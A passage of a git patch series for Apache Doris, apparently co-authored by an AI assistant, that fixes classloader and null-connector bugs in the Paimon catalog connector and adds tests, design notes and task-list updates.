folded), impl-verify COMMIT_AS_IS. e2e gated. See + `designs/FIX-B-R2-BE-SCHEMA-DICT-MEMO-*.md`. - **Finding:** report §R2 (be). `buildSchemaEvolutionParam:1214-1232` emits the `-1` (current, from requested columns — cheap, keep) PLUS **one entry per `schemaManager.listAllIds()`** — reading every committed schema file even for a single-schema query. Legacy added entries lazily, one per distinct file `schema_id` a split referenced, + `-1`. From 2612af5e88fb7388cfaf17681dfa89fccf42b449 Mon Sep 17 00:00:00 2001 From: morningman Date: Fri, 19 Jun 2026 19:56:47 +0800 Subject: [PATCH 121/128] =?UTF-8?q?fix:=20P2-T04=20=E2=80=94=20MetaStorePr?= =?UTF-8?q?oviders=20ServiceLoader=20uses=20the=20SPI's=20own=20classloade?= =?UTF-8?q?r,=20not=20TCCL?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit CI external 973270 (commit 13d3876): all 37 paimon-family tests failed at CREATE CATALOG with 'No MetaStoreProvider supports the given properties; registered providers: []'. Root cause: MetaStoreProviders.PROVIDERS is a static field loaded once via the 1-arg ServiceLoader.load(MetaStoreProvider.class), which resolves against the thread-context classloader. Its first touch is PaimonConnectorProvider.validateProperties at CREATE CATALOG time, running on an FE worker thread whose TCCL is the FE app loader. fe-core does not depend on fe-connector-metastore-spi, so the 5 providers and their META-INF/services file live only inside the connector plugin's child classloader; the lookup finds nothing and caches an empty list process-wide, so every paimon CREATE CATALOG fails. (The sibling PaimonConnector.createCatalogFromContext already pins the TCCL for the same reason; the validation path did not.) Fix: load via the 2-arg ServiceLoader.load(MetaStoreProvider.class, MetaStoreProvider.class.getClassLoader()) — the interface's defining loader is the plugin loader that has the service file and impls, independent of the caller's TCCL. Tests: fe-connector-metastore-spi 44/0/0, checkstyle 0. The classloader behavior is single-classpath-invisible (1-arg and 2-arg both pass in surefire); real gate is the P2-T05 docker plugin-layout regression (enablePaimonTest=true). Co-Authored-By: Claude Opus 4.8 (1M context) --- .../connector/metastore/spi/MetaStoreProviders.java | 10 +++++++++- 1 file changed, 9 insertions(+), 1 deletion(-) diff --git a/fe/fe-connector/fe-connector-metastore-spi/src/main/java/org/apache/doris/connector/metastore/spi/MetaStoreProviders.java b/fe/fe-connector/fe-connector-metastore-spi/src/main/java/org/apache/doris/connector/metastore/spi/MetaStoreProviders.java index 93675220710806..aa88a5f3ed4806 100644 --- a/fe/fe-connector/fe-connector-metastore-spi/src/main/java/org/apache/doris/connector/metastore/spi/MetaStoreProviders.java +++ b/fe/fe-connector/fe-connector-metastore-spi/src/main/java/org/apache/doris/connector/metastore/spi/MetaStoreProviders.java @@ -41,7 +41,15 @@ private MetaStoreProviders() { private static List load() { List list = new ArrayList<>(); - ServiceLoader.load(MetaStoreProvider.class).forEach(list::add); + // Use the SPI interface's own defining classloader, not the thread-context classloader. + // At CREATE CATALOG time this static initializer is first triggered from + // PaimonConnectorProvider.validateProperties, which runs on an FE worker thread whose TCCL is + // the FE app loader. fe-core does not depend on fe-connector-metastore-spi, so the providers and + // their META-INF/services file live only inside the connector plugin's (child) classloader; a + // 1-arg ServiceLoader.load (TCCL) therefore finds nothing and caches an empty list process-wide. + // MetaStoreProvider.class.getClassLoader() is the plugin loader that defined this interface, so it + // can see the service file and the impls regardless of the caller's TCCL. + ServiceLoader.load(MetaStoreProvider.class, MetaStoreProvider.class.getClassLoader()).forEach(list::add); return list; } From e1d6f88ff363e68097f87162738f9e98bcb4d1d1 Mon Sep 17 00:00:00 2001 From: morningman Date: Fri, 19 Jun 2026 19:57:11 +0800 Subject: [PATCH 122/128] docs(catalog-spi): P2-T04 ServiceLoader 2-arg fix done (2612af5e88f); remaining = paimon pom + gate Co-Authored-By: Claude Opus 4.8 (1M context) --- plan-doc/HANDOFF.md | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/plan-doc/HANDOFF.md b/plan-doc/HANDOFF.md index b6f6d6bf20d790..dda48b4f74da8d 100644 --- a/plan-doc/HANDOFF.md +++ b/plan-doc/HANDOFF.md @@ -175,8 +175,10 @@ paimon connector 全功能路径 clean-room 对抗 review(6 维度 + 7 缺口 - **不可删(STILL-CONSUMED)**:`property/metastore/Paimon*MetaStoreProperties`+`PaimonPropertiesFactory`+`AbstractPaimonProperties`(cutover Kerberos 装配 LIVE,R1)、`property/storage/{S3,OSS,COS,OBS,Minio}Properties`(跨连接器共享,R2)。**B8 scope 不含这两树。** - 逐子树删 + 每批跑 fe-core 编译 + 连接器测 + regression-gated。与元存储子线 D-016 一致(那两包不碰)。 -2. **元存储子线收尾**([`metastore-storage-refactor/`](./metastore-storage-refactor/)):P2-T04(paimon pom + gate, - ⚠️ `MetaStoreProviders` ServiceLoader 改 2-arg 显式 loader 防子优先 loader 下发现不到 provider)→ P2-T05(docker +2. **元存储子线收尾**([`metastore-storage-refactor/`](./metastore-storage-refactor/)):P2-T04(剩 paimon pom + gate; + ✅ `MetaStoreProviders` ServiceLoader 已改 2-arg 显式 loader `MetaStoreProvider.class.getClassLoader()`(`2612af5e88f`)—— + CI external **973270**(commit `13d3876`)实证:1-arg TCCL 在插件 child loader 下 `registered providers: []`,全 37 个 + paimon 家族测试 CREATE CATALOG 挂;单测单 classpath 不可区分 1-arg/2-arg(44/0 绿),真闸仍在 P2-T05 docker)→ P2-T05(docker 5-flavor 真闸 + vended(REST/DLF) + Kerberos HMS + storage 等价,合并原 P1-T06;`enablePaimonTest=true`)。 3. **D-057 re-scope**(第三轮报告 §D.3):deferred `TablePartitionValues:162` prune-path sentinel residue **不影响 paimon**(MVCC override 绕过)→ re-scope 到非-MVCC 插件连接器(maxcompute/es/jdbc)。 From e6f5d81aa7a9249c6dea2a12c7fccbb35368c1f1 Mon Sep 17 00:00:00 2001 From: morningman Date: Sat, 20 Jun 2026 01:21:25 +0800 Subject: [PATCH 123/128] =?UTF-8?q?fix:=20FIX-1=20(CI=20973411)=20?= =?UTF-8?q?=E2=80=94=20pin=20paimon=20HiveConf=20classloader=20to=20the=20?= =?UTF-8?q?plugin=20loader?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit - root cause: HiveMetaStoreClient.loadFilterHooks -> Configuration.getClass resolves metastore.filter.hook via the HiveConf's own classLoader field. assembleHiveConf's `new HiveConf()` captured the TCCL at construction (parent 'app' loader, before the plugin TCCL pin in createCatalogFromContext); under child-first plugin loading that resolved DefaultMetaStoreFilterHookImpl from the parent while MetaStoreFilterHook was child-loaded -> "class DefaultMetaStoreFilterHookImpl not MetaStoreFilterHook" -> paimon-over-HMS `create database` failed (test_create_paimon_table:44). - solution: assembleHiveConf now calls hiveConf.setClassLoader(plugin loader), mirroring buildHadoopConfiguration:257. Single chokepoint -> covers both the hms and dlf flavors. Connector-local; fe-core stays connector-agnostic. - tests: PaimonCatalogFactoryTest.assembleHiveConfPinsPluginClassLoaderNotTccl (installs a foreign TCCL, asserts the conf is pinned to the plugin loader; RED before / GREEN after). Full class 16/16 pass; module checkstyle clean. Real gate = docker enablePaimonTest=true. Co-Authored-By: Claude Opus 4.8 (1M context) Claude-Session: https://claude.ai/code/session_011mTrPcvMZtFjsxWJM5TRnG --- .../paimon/PaimonCatalogFactory.java | 9 ++++ .../paimon/PaimonCatalogFactoryTest.java | 26 ++++++++++ .../fix-973411-1-hms-classloader-design.md | 51 +++++++++++++++++++ .../fix-973411-1-hms-classloader-summary.md | 23 +++++++++ plan-doc/task-list.md | 18 +++---- 5 files changed, 117 insertions(+), 10 deletions(-) create mode 100644 plan-doc/fix-973411-1-hms-classloader-design.md create mode 100644 plan-doc/fix-973411-1-hms-classloader-summary.md diff --git a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonCatalogFactory.java b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonCatalogFactory.java index 1f7324578f8aae..9b91bbb153b614 100644 --- a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonCatalogFactory.java +++ b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonCatalogFactory.java @@ -322,6 +322,15 @@ private static void applyStorageConfig(Map storageHadoopConfig, */ public static HiveConf assembleHiveConf(Map base, Map overrides) { HiveConf hiveConf = new HiveConf(); + // Pin the conf classloader to the plugin loader, mirroring buildHadoopConfiguration (above). + // HiveMetaStoreClient.loadFilterHooks resolves metastore.filter.hook via Configuration.getClass, + // which uses the conf's OWN classLoader field (= the thread-context CL captured at new HiveConf(), + // which here is still the parent 'app' loader because assembleHiveConf runs before the TCCL pin in + // PaimonConnector.createCatalogFromContext). Under child-first plugin loading that resolves + // DefaultMetaStoreFilterHookImpl from the parent while MetaStoreFilterHook is child-loaded, giving + // "class DefaultMetaStoreFilterHookImpl not MetaStoreFilterHook". Pinning keeps the whole + // hive-metastore class graph in one loader (covers both the hms and dlf flavors). + hiveConf.setClassLoader(PaimonCatalogFactory.class.getClassLoader()); if (base != null) { base.forEach(hiveConf::set); } diff --git a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonCatalogFactoryTest.java b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonCatalogFactoryTest.java index e73f4dd7530b76..c944ec4c59c699 100644 --- a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonCatalogFactoryTest.java +++ b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonCatalogFactoryTest.java @@ -28,6 +28,8 @@ import org.junit.jupiter.api.Assertions; import org.junit.jupiter.api.Test; +import java.net.URL; +import java.net.URLClassLoader; import java.util.Collections; import java.util.HashMap; import java.util.Map; @@ -387,6 +389,30 @@ public void assembleHiveConfSeedsBaseThenOverridesWin() { Assertions.assertEquals("doris", hc.get("hadoop.username")); } + @Test + public void assembleHiveConfPinsPluginClassLoaderNotTccl() { + // WHY (FIX-1, CI 973411): HiveMetaStoreClient.loadFilterHooks resolves metastore.filter.hook via + // Configuration.getClass, which uses the HiveConf's OWN classLoader field. new HiveConf() captures + // the thread-context CL active AT CONSTRUCTION into that field. At runtime assembleHiveConf runs + // before the plugin TCCL pin, so the conf would capture the parent 'app' loader; under child-first + // plugin loading that resolves DefaultMetaStoreFilterHookImpl from the parent while + // MetaStoreFilterHook is child-loaded -> "class ... not ...". The conf MUST be pinned to the plugin + // loader (the one that loaded HiveMetaStoreClient/MetaStoreFilterHook), exactly as + // buildHadoopConfiguration already does. MUTATION: drop the setClassLoader -> the conf keeps the + // foreign TCCL below -> red. (A flat-classpath assertion alone cannot repro the real cross-loader + // cast, so we install a distinct TCCL to make the captured-loader bug observable offline.) + ClassLoader foreign = new URLClassLoader(new URL[0], null); + ClassLoader prev = Thread.currentThread().getContextClassLoader(); + try { + Thread.currentThread().setContextClassLoader(foreign); + HiveConf hc = PaimonCatalogFactory.assembleHiveConf(null, Collections.emptyMap()); + Assertions.assertSame(PaimonCatalogFactory.class.getClassLoader(), hc.getClassLoader()); + Assertions.assertNotSame(foreign, hc.getClassLoader()); + } finally { + Thread.currentThread().setContextClassLoader(prev); + } + } + @Test public void assembleHiveConfAcceptsNullBase() { // WHY: the dlf flavor has no hive.conf.resources base, so it passes null; assembleHiveConf must diff --git a/plan-doc/fix-973411-1-hms-classloader-design.md b/plan-doc/fix-973411-1-hms-classloader-design.md new file mode 100644 index 00000000000000..16df5ae5ffd03c --- /dev/null +++ b/plan-doc/fix-973411-1-hms-classloader-design.md @@ -0,0 +1,51 @@ +# FIX-1 — test_create_paimon_table: paimon-over-HMS `create database` classloader split + +## Problem +CI 973411 `external_table_p0/paimon/test_paimon_table.groovy:44`: creating a paimon catalog with +`paimon.catalog.type=hms` then `create database if not exists test_db` fails: +`Failed to create Paimon catalog with HMS metastore (flavor=hms): Failed to create the desired metastore +client (HiveMetaStoreClient)`. + +## Root Cause +`fe.log:423900` deepest cause: `class org.apache.hadoop.hive.metastore.DefaultMetaStoreFilterHookImpl not +org.apache.hadoop.hive.metastore.MetaStoreFilterHook` from `HiveMetaStoreClient.loadFilterHooks:252`. +`Configuration.getClass("metastore.filter.hook", DefaultMetaStoreFilterHookImpl.class, MetaStoreFilterHook.class)` +resolves the configured class NAME through the **`Configuration` object's own `classLoader` field**, NOT the +thread-context CL. `new HiveConf()` captures the TCCL active *at construction* into that field. In +`PaimonConnector.createCatalog` the HiveConf is built by `assembleHiveConf` BEFORE `createCatalogFromContext` +pins the TCCL to the plugin loader — and `getClass` ignores the TCCL anyway. Under child-first plugin loading, +`DefaultMetaStoreFilterHookImpl` (resolved by name via the parent app loader) ≠ the child-loaded +`MetaStoreFilterHook` interface → the cast check throws. + +The filesystem/jdbc path is immune: `buildHadoopConfiguration` already calls +`conf.setClassLoader(PaimonCatalogFactory.class.getClassLoader())` (PaimonCatalogFactory.java:257). +`assembleHiveConf` (line 323-330) never does. Legacy master ran in a single app loader, so no split. +Classification: **SPI regression** (introduced by child-first plugin packaging). Also covers DLF (shares +`assembleHiveConf`). + +## Design +Pin the HiveConf classloader to the paimon plugin loader in `assembleHiveConf`, exactly mirroring +`buildHadoopConfiguration:257`. This makes every by-name class lookup `HiveMetaStoreClient` performs resolve +through the same child loader that loaded `HiveMetaStoreClient`/`MetaStoreFilterHook`. Single chokepoint → +fixes both HMS and DLF. Entirely inside the paimon connector module (connector-agnostic rule respected). + +## Implementation Plan +`PaimonCatalogFactory.assembleHiveConf`: add `hiveConf.setClassLoader(PaimonCatalogFactory.class.getClassLoader())` +immediately after `new HiveConf()`. + +## Risk Analysis +Minimal. Identical idiom already in use one method up. Pinning to the plugin loader is strictly more correct +than the captured-TCCL default; cannot regress the FS path (separate builder). No behavior change for the +single-classpath UT environment. + +## Test Plan +### Unit Tests +`PaimonCatalogFactoryTest.assembleHiveConfPinsPluginClassLoaderNotTccl`: set a *foreign* TCCL +(`new URLClassLoader(new URL[0], null)`) before calling `assembleHiveConf`, assert the returned HiveConf's +`getClassLoader()` is the plugin loader (`PaimonCatalogFactory.class.getClassLoader()`), not the foreign TCCL. +RED before fix (HiveConf captures the foreign TCCL), GREEN after. Encodes WHY: the conf must resolve by-name +classes through the plugin loader independent of whatever TCCL was active at construction. + +### E2E Tests +Existing `test_paimon_table.groovy` / `test_paimon_catalog.groovy` under docker `enablePaimonTest=true` are the +real gate (a flat-classpath UT cannot reproduce the actual cross-loader cast). Currently RED; expected GREEN. diff --git a/plan-doc/fix-973411-1-hms-classloader-summary.md b/plan-doc/fix-973411-1-hms-classloader-summary.md new file mode 100644 index 00000000000000..a723da7bdb8444 --- /dev/null +++ b/plan-doc/fix-973411-1-hms-classloader-summary.md @@ -0,0 +1,23 @@ +# FIX-1 Summary — paimon-over-HMS create-db classloader split + +## Problem +CI 973411 `test_create_paimon_table:44`: `create database` on a `paimon.catalog.type=hms` catalog failed with +`Failed to create the desired metastore client (HiveMetaStoreClient)`. + +## Root Cause +`HiveMetaStoreClient.loadFilterHooks` → `Configuration.getClass("metastore.filter.hook", ...)` resolves the +class by name through the `HiveConf` object's own `classLoader` field. `new HiveConf()` in `assembleHiveConf` +captured the TCCL active at construction (= parent app loader, since it runs before the plugin TCCL pin), so +under child-first plugin loading `DefaultMetaStoreFilterHookImpl` (parent) ≠ child-loaded `MetaStoreFilterHook` +→ "class … not …". The filesystem builder already pinned the conf loader (line 257); `assembleHiveConf` did not. + +## Fix +`PaimonCatalogFactory.assembleHiveConf`: `hiveConf.setClassLoader(PaimonCatalogFactory.class.getClassLoader())` +right after `new HiveConf()`. Single chokepoint → covers both HMS and DLF. Connector-local. + +## Tests +`PaimonCatalogFactoryTest.assembleHiveConfPinsPluginClassLoaderNotTccl`: installs a foreign TCCL, asserts the +returned HiveConf is pinned to the plugin loader. RED before / GREEN after. Full class: 16/16 pass; checkstyle clean. + +## Result +Fixed (offline UT). Real gate: docker `enablePaimonTest=true` rerun of test_paimon_table / test_paimon_catalog. diff --git a/plan-doc/task-list.md b/plan-doc/task-list.md index 2eeca2f41ca183..3f70e397e6968e 100644 --- a/plan-doc/task-list.md +++ b/plan-doc/task-list.md @@ -1,13 +1,11 @@ -# Task List — CI 968994 paimon regression fixes +# Task List — CI 973411 paimon-SPI regression fixes -Build 968994 (commit 3d93f195eff). 32 failures. Root: recent self-contained packaging -commits are internally incomplete + one SPI explain-gap regression. F (hive_ctas) = stale, excluded. +Source RCA: `memory/catalog-spi-ci-973411-4fails-rca.md` + workflow `wf_e1c3d93c-22c` (adversarially verified). +Build 973411, HEAD e1d6f88. All 4 test files are byte-identical to master ⇒ all 4 are SPI-migration regressions. -- [x] FIX-A — bundle s3-transfer-manager (Class A: s3 FileIO/AWS SDK interceptor skew; 6 direct + 18 collateral) — `75496c94e36` -- [x] FIX-B — bundle hadoop-huaweicloud (Class B: obs cross-loader cast; paimon_base_filesystem) — `3c7adfe1de1` -- [x] FIX-C — paimon-hive-shade module, relocate thrift (Class C: TFramedTransport NoClassDefFound; 2 tests) — `5ac8c302596` -- [x] FIX-E — PluginDrivenScanNode/PaimonScanPlanProvider explain emission (Class E: 5 explain-mismatch) — `d4526013364` +- [x] FIX-1 — test_create_paimon_table: paimon-over-HMS create-db classloader split (PaimonCatalogFactory.assembleHiveConf) — DONE (16/16 UT, checkstyle clean) +- [ ] FIX-2 — test_mysql_mtmv: connector-null NPE during mv_infos scan (PluginDrivenMvccExternalTable.materializeLatest) +- [ ] FIX-3 — test_paimon_mtmv: Duplicated p_NULL partition naming (ListPartitionItem.toPartitionKeyDesc) +- [ ] FIX-4 — test_paimon_table_meta_cache: restore paimon table snapshot cache (PaimonConnector + Connector SPI + fe-core refresh wiring) -Excluded: -- F — external_table_p0.hive.write.test_hive_ctas_to_doris: pre-existing stale test (auto-partition-name - truncation #56304 on master), not a branch regression. Track upstream / exclude from gating. +Order: 1 → 2 → 3 → 4 (smallest/lightest module first; #4 largest). TDD per fix, independent commit each. From 95ebfbc45dc7c9ae4e15f08ee1adb5534ab9fb98 Mon Sep 17 00:00:00 2001 From: morningman Date: Sat, 20 Jun 2026 01:31:08 +0800 Subject: [PATCH 124/128] =?UTF-8?q?fix:=20FIX-2=20(CI=20973411)=20?= =?UTF-8?q?=E2=80=94=20guard=20null=20connector=20in=20materializeLatest?= =?UTF-8?q?=20(dropped-catalog=20race)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit - root cause: a concurrent CATALOG DROP leaves a PluginDrivenExternalCatalog with connector=null but objectCreated=true (onClose() nulls the transient connector but does not reset objectCreated, and dropCatalog calls onClose() directly, not resetToUninitialized). A stale mv_infos()/jobs() metadata scan iterates all MTMVs and reaches such a dropped catalog's related table; materializeLatest() dereferenced the null connector -> NPE that aborted the whole metadata query, failing the unrelated test_mysql_mtmv (getJobName). Legacy onClose never nulled the field. - solution: materializeLatest() returns a valid empty pin (snapshot id -1, empty partition maps) when getConnector() is null, mirroring the existing dropped-table (no-handle) branch. Connector-agnostic; getConnector()'s contract unchanged; cannot mask a real init failure (initLocalObjectsImpl throws when it cannot build a connector on a healthy catalog). - tests: PluginDrivenMvccExternalTableTest.testMaterializeLatestNullConnectorDegradesToEmptyPin (null-connector catalog -> loadSnapshot returns the empty pin; the RED run threw the exact production NPE). Full class 36/36; fe-core checkstyle clean. Co-Authored-By: Claude Opus 4.8 (1M context) Claude-Session: https://claude.ai/code/session_011mTrPcvMZtFjsxWJM5TRnG --- .../PluginDrivenMvccExternalTable.java | 12 +++++ .../PluginDrivenMvccExternalTableTest.java | 29 ++++++++++ .../fix-973411-2-connector-null-design.md | 54 +++++++++++++++++++ .../fix-973411-2-connector-null-summary.md | 25 +++++++++ plan-doc/task-list.md | 2 +- 5 files changed, 121 insertions(+), 1 deletion(-) create mode 100644 plan-doc/fix-973411-2-connector-null-design.md create mode 100644 plan-doc/fix-973411-2-connector-null-summary.md diff --git a/fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenMvccExternalTable.java b/fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenMvccExternalTable.java index ba8556e8e990fd..90acd698bc5ea4 100644 --- a/fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenMvccExternalTable.java +++ b/fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenMvccExternalTable.java @@ -118,6 +118,18 @@ private PluginDrivenMvccSnapshot materializeLatest() { makeSureInitialized(); PluginDrivenExternalCatalog pluginCatalog = (PluginDrivenExternalCatalog) catalog; Connector connector = pluginCatalog.getConnector(); + if (connector == null) { + // The backing catalog was concurrently DROPPED: onClose() nulled the (transient) connector but + // left objectCreated=true, so makeSureInitialized() does not re-create it and getConnector() + // returns null. A stale metadata-table access (e.g. an mv_infos()/jobs() scan over all MTMVs -> + // isMTMVSync -> a related table here) must DEGRADE to a valid empty pin so it yields an empty + // partition view instead of NPE-ing and aborting the whole metadata query. Mirrors the + // table-dropped (no-handle) branch below. On a HEALTHY catalog the connector is never null after + // makeSureInitialized() (initLocalObjectsImpl throws if it cannot create one), so this guard only + // covers the dropped-catalog race and cannot mask a genuine init failure. + return new PluginDrivenMvccSnapshot(emptySnapshot(), + Collections.emptyMap(), Collections.emptyMap()); + } ConnectorSession session = pluginCatalog.buildConnectorSession(); ConnectorMetadata metadata = connector.getMetadata(session); diff --git a/fe/fe-core/src/test/java/org/apache/doris/datasource/PluginDrivenMvccExternalTableTest.java b/fe/fe-core/src/test/java/org/apache/doris/datasource/PluginDrivenMvccExternalTableTest.java index 0d07b3bc2f9c3d..bee83207b83726 100644 --- a/fe/fe-core/src/test/java/org/apache/doris/datasource/PluginDrivenMvccExternalTableTest.java +++ b/fe/fe-core/src/test/java/org/apache/doris/datasource/PluginDrivenMvccExternalTableTest.java @@ -260,6 +260,35 @@ public void testLoadSnapshotNoHandleLatestDegradesToEmptyPin() { "the no-handle latest pin must have an empty last-modified map"); } + @Test + public void testMaterializeLatestNullConnectorDegradesToEmptyPin() { + // A concurrently-DROPPED catalog: onClose() nulled the (transient) connector but left objectCreated + // true, so makeSureInitialized() does not re-create it and getConnector() returns null. A stale + // metadata-table access (mv_infos()/jobs() scan -> isMTMVSync -> materializeLatest) must DEGRADE to a + // valid empty pin instead of NPE-ing and aborting the whole metadata query (CI 973411 test_mysql_mtmv + // collateral). MUTATION: dropping the null-connector guard in materializeLatest -> NPE -> red. + ConnectorSession session = Mockito.mock(ConnectorSession.class); + PluginDrivenExternalCatalog droppedCatalog = new TestablePluginCatalog((Connector) null, session); + ExternalDatabase db = mockDb("REMOTE_DB"); + PluginDrivenMvccExternalTable table = + new PluginDrivenMvccExternalTable(1L, "tbl", "REMOTE_TBL", droppedCatalog, db) { + @Override + protected synchronized void makeSureInitialized() { + // no-op: skip Env-backed catalog/db init (mirror the Fixture table) + } + }; + + PluginDrivenMvccSnapshot pin = + (PluginDrivenMvccSnapshot) table.loadSnapshot(Optional.empty(), Optional.empty()); + + Assertions.assertEquals(-1L, pin.getConnectorSnapshot().getSnapshotId(), + "the null-connector (dropped-catalog) latest pin must carry the -1 snapshot sentinel"); + Assertions.assertTrue(pin.getNameToPartitionItem().isEmpty(), + "the null-connector latest pin must have an empty partition-item map"); + Assertions.assertTrue(pin.getNameToLastModifiedMillis().isEmpty(), + "the null-connector latest pin must have an empty last-modified map"); + } + @Test public void testLoadSnapshotNoHandleTimeTravelThrows() { // No connector handle on a TIME-TRAVEL request: unlike the latest path it must FAIL LOUD (a diff --git a/plan-doc/fix-973411-2-connector-null-design.md b/plan-doc/fix-973411-2-connector-null-design.md new file mode 100644 index 00000000000000..66b08253886add --- /dev/null +++ b/plan-doc/fix-973411-2-connector-null-design.md @@ -0,0 +1,54 @@ +# FIX-2 — test_mysql_mtmv: connector-null NPE during mv_infos scan (collateral) + +## Problem +CI 973411 `mtmv_p0/test_mysql_mtmv.groovy:63` fails with +`[INTERNAL_ERROR] Cannot invoke Connector.getMetadata(...) because "connector" is null`. The MySQL MTMV test +itself is healthy — it is collateral. + +## Root Cause +`getJobName` runs an `mv_infos`/`jobs` metadata scan → `MetadataGenerator.mtmvMetadataResult` loops over ALL +MTMVs in the db → `MTMVPartitionUtil.isMTMVSync` → the related paimon table's +`PluginDrivenMvccExternalTable.materializeLatest:122` dereferences a **null** `connector` +(`pluginCatalog.getConnector()`), throwing NPE that aborts the whole metadata query. + +Why null: `PluginDrivenExternalCatalog.connector` is `transient volatile` (line 71). `onClose()` (549-559) +sets `connector = null` but does NOT reset the inherited `objectCreated` flag. `dropCatalog` cleanup calls +`catalog.onClose()` **directly** (`CatalogMgr.cleanupRemovedCatalog:144`), not `resetToUninitialized()` (which +*does* reset `objectCreated`, :625). So a just-dropped catalog object is left `objectCreated=true, +connector=null`; a concurrent stale access calls `makeSureInitialized()` → `initLocalObjects()` skips +`initLocalObjectsImpl()` (the only place the connector is recreated) because `objectCreated` is still true → +`getConnector()` returns null. FE log: catalog drop 21:15:44,724; NPE 21:15:44,748 (24 ms race), +fe.log:83972. Legacy master `PaimonExternalCatalog.onClose()` closed the client but never nulled the field, so +this NPE could not occur. Classification: **SPI regression** (lifecycle), surfaced by a concurrency race. + +A null connector after `makeSureInitialized()` is reachable ONLY in this dropped-catalog state: on a healthy +catalog, `initLocalObjectsImpl` THROWS if it cannot create a connector (:115-119) — so the guard cannot mask a +real init failure. + +## Design +Guard the null connector at the NPE site in `materializeLatest`: if `connector == null`, return a valid empty +pin (snapshot id -1, empty partition maps), exactly mirroring the existing dropped-**table** branch (:125-130). +Smallest change at the actual failure point; connector-agnostic; keeps `getConnector()`'s contract unchanged. +A stale dropped-catalog MTMV access then yields a benign empty result instead of aborting the scan. + +(Not chosen: re-creating the connector in `onClose` — wrong for a genuinely dropped catalog. Optional separate +defense-in-depth, pre-existing generic MTMV code: per-MTMV try/catch in `MetadataGenerator.mtmvMetadataResult` +so one bad MTMV can't fail the whole scan — out of scope for this SPI-regression fix.) + +## Implementation Plan +`PluginDrivenMvccExternalTable.materializeLatest`: after `Connector connector = pluginCatalog.getConnector();`, +add `if (connector == null) return new PluginDrivenMvccSnapshot(emptySnapshot(), Collections.emptyMap(), +Collections.emptyMap());`. + +## Risk Analysis +Minimal. Empty maps → `isPartitionInvalid()==false` → `getPartitionColumns` returns the cached static columns +(no NPE). Cannot mask a genuine init failure (that path throws). No effect on the healthy path. + +## Test Plan +### Unit Tests +`PluginDrivenMvccExternalTableTest.testMaterializeLatestNullConnectorDegradesToEmptyPin`: build a table over a +catalog whose `getConnector()` returns null, call `loadSnapshot(empty, empty)`, assert it returns an empty pin +(snapshot id -1, empty maps) and does not NPE. RED before / GREEN after. + +### E2E Tests +Race-dependent; covered indirectly by the existing mtmv_p0 paimon suites under docker enablePaimonTest=true. diff --git a/plan-doc/fix-973411-2-connector-null-summary.md b/plan-doc/fix-973411-2-connector-null-summary.md new file mode 100644 index 00000000000000..9be2b60ecf64a7 --- /dev/null +++ b/plan-doc/fix-973411-2-connector-null-summary.md @@ -0,0 +1,25 @@ +# FIX-2 Summary — connector-null NPE during mv_infos scan (collateral) + +## Problem +CI 973411 `test_mysql_mtmv:63` failed with `Connector.getMetadata(...) because "connector" is null`. The MySQL +test is collateral: its `getJobName` runs an `mv_infos` scan that iterates all MTMVs. + +## Root Cause +A concurrent catalog DROP: `PluginDrivenExternalCatalog.onClose()` nulls the transient `connector` but does not +reset `objectCreated`; `dropCatalog` calls `onClose()` directly (not `resetToUninitialized`), so a stale +metadata access finds `getConnector()==null` (makeSureInitialized skips re-init). `materializeLatest:122` +dereferenced it → NPE aborted the whole metadata query. Legacy `onClose` never nulled the field. + +## Fix +`PluginDrivenMvccExternalTable.materializeLatest`: if `connector == null`, return a valid empty pin +(snapshot id -1, empty maps), mirroring the existing dropped-table (no-handle) branch. Connector-agnostic; +`getConnector()` contract unchanged. Cannot mask a real init failure (that path throws). + +## Tests +`PluginDrivenMvccExternalTableTest.testMaterializeLatestNullConnectorDegradesToEmptyPin`: table over a +null-connector catalog → `loadSnapshot(empty,empty)` returns the empty pin instead of NPE. The RED run threw +the exact production NPE; GREEN after. Full class 36/36; fe-core checkstyle clean. + +## Result +Fixed (offline UT reproduces + verifies). Optional pre-existing defense-in-depth (per-MTMV try/catch in +`MetadataGenerator.mtmvMetadataResult`) left out of scope. diff --git a/plan-doc/task-list.md b/plan-doc/task-list.md index 3f70e397e6968e..a6a1c8b46223c2 100644 --- a/plan-doc/task-list.md +++ b/plan-doc/task-list.md @@ -4,7 +4,7 @@ Source RCA: `memory/catalog-spi-ci-973411-4fails-rca.md` + workflow `wf_e1c3d93c Build 973411, HEAD e1d6f88. All 4 test files are byte-identical to master ⇒ all 4 are SPI-migration regressions. - [x] FIX-1 — test_create_paimon_table: paimon-over-HMS create-db classloader split (PaimonCatalogFactory.assembleHiveConf) — DONE (16/16 UT, checkstyle clean) -- [ ] FIX-2 — test_mysql_mtmv: connector-null NPE during mv_infos scan (PluginDrivenMvccExternalTable.materializeLatest) +- [x] FIX-2 — test_mysql_mtmv: connector-null NPE during mv_infos scan (PluginDrivenMvccExternalTable.materializeLatest) — DONE (36/36 UT, RED reproduced exact NPE, checkstyle clean) - [ ] FIX-3 — test_paimon_mtmv: Duplicated p_NULL partition naming (ListPartitionItem.toPartitionKeyDesc) - [ ] FIX-4 — test_paimon_table_meta_cache: restore paimon table snapshot cache (PaimonConnector + Connector SPI + fe-core refresh wiring) From 26a8ecd5a8a3f8263146f1a2b0dc9bc682740376 Mon Sep 17 00:00:00 2001 From: morningman Date: Sat, 20 Jun 2026 01:42:52 +0800 Subject: [PATCH 125/128] 